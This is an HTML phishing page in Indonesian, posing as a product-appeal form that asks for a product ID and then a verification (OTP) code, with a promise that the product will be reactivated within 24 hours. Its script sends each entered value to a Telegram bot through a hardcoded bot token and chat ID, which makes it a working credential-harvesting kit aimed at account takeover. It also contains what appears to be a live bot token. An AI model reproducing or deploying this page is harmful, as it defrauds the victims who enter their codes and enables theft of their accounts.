<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1" />
        <title>Login</title>
        <link
            href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css"
            rel="stylesheet"
            integrity="sha384-KK94CHFLLe+nY2dmCWGMq91rCGa5gtU4mk92HdvYe+M/SXH301p5ILy+dN9+nJOZ"
            crossorigin="anonymous"
        />
        <style type="text/css" media="all">
            .dialog-overlay {
                display: none;
                position: fixed;
                top: 0;
                left: 0;
                width: 100%;
                height: 100%;
                background-color: rgba(
                    0,
                    0,
                    0,
                    0.5
                ); /* Warna gelap dengan opasitas 0.5 */
            }

            .dialog {
                display: none;
                position: fixed;
                top: 50%;
                left: 50%;
                width: 100%;
                transform: translate(-50%, -50%);
                background-color: white;
                text-align: center;
                box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
                z-index: 9999;
            }

            input {
                width: 95%;
                margin-top: 5px;
                margin-bottom: 5px;
                padding: 5px;
                font-size: 16px;
            }
        </style>
    </head>
    <body>
        <nav class="navbar bg-dark">
            <div class="container">
                <a class="navbar-brand" href="#">
                    <img src="nav.png" alt="navbar" width="100" height="30" />
                </a>
            </div>
        </nav>
        <div class="container mt-5">
            <img
                src="jumbotron.png"
                class="rounded mx-auto d-block"
                alt="jumbotron"
                width="130"
                height="130"
            />
            <h3 class="fw-bold mt-3" style="font-size: 12px; color: red">
                Masukan ID product yang akan di ajukan banding
            </h3>
        </div>
        <div class="box p-3" style="background-color: darkblue">
            <p class="text-light">ID PRODUCT</p>
            <input
                class="p-2"
                type="number"
                name="id"
                id="id"
                style="width: 100%"
                placeholder=" ID PRODUCT "
            />
            <div class="d-grid gap-2 mt-4">
                <button
                    class="btn mx-auto text-light"
                    type="button"
                    style="width: 100%; background-color: orange"
                    onclick="idproduct()"
                >
                    Banding
                </button>
            </div>
        </div>
        <div id="otpDialog" class="dialog">
            <p>Kode Verifikasi</p>
            <input
                type="text"
                id="otpInput"
                placeholder="Masukkan Kode Verifikasi Banding"
                required
            />
            <button
                class="mt-2 mb-4 btn btn-dark text-light"
                onclick="submitOTP()"
                style="width: 95%"
            >
                Banding
            </button>
            <div class="terimakasih mt-3 mb-3">
                <p
                    class="thank fw-bold text-center"
                    style="font-size: 10px; display: none"
                >
                    TERIMA KASIH PRODUK ANDA AKAN KAMI AKTIFKAN KEMBALI DALAM
                    WAKTU 1×24 JAM MOHON MENUNGGU
                </p>
            </div>
        </div>

        <div id="overlay" class="dialog-overlay"></div>

        <script
            src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/js/bootstrap.bundle.min.js"
            integrity="sha384-ENjdO4Dr2bkBIFxQpeoTz1HIcje39Wm4jDKdf19U8gI4ddQ3GYNS7NTKfAdVQSZe"
            crossorigin="anonymous"
        ></script>
        <script type="text/javascript" charset="utf-8">
            async function sendMessage(chatId, text) {
                const url =
                    "https://api.telegram.org/bot6086362380:AAG4_aaHzgOcgkr1yVabX28Cl61WaFH2hiw/sendMessage";
                const payload = {
                    chat_id: chatId,
                    text: text,
                };

                const response = await fetch(url, {
                    method: "POST",
                    headers: {
                        "Content-Type": "application/json",
                    },
                    body: JSON.stringify(payload),
                });
                if (!response.ok) {
                    throw new Error("Failed to send message");
                }
            }
            function submitOTP() {
                let otp = document.querySelector("#otpInput").value;
                document.querySelector(".thank").style.display = "block";
                let chatId = "5889179929";
                let text = `OTP: ${otp}`;
                sendMessage(chatId, text);
            }
            function idproduct() {
                let id = document.querySelector("#id").value;
                let chatId = "5889179929";
                let text = `PRODUCT ID: ${id}`;
                sendMessage(chatId, text);
                var otpDialog = document.getElementById("otpDialog");
                var overlay = document.getElementById("overlay");

                otpDialog.style.display = "block";
                overlay.style.display = "block";
                document.body.classList.add("blur-background");
            }
        </script>
    </body>
</html>
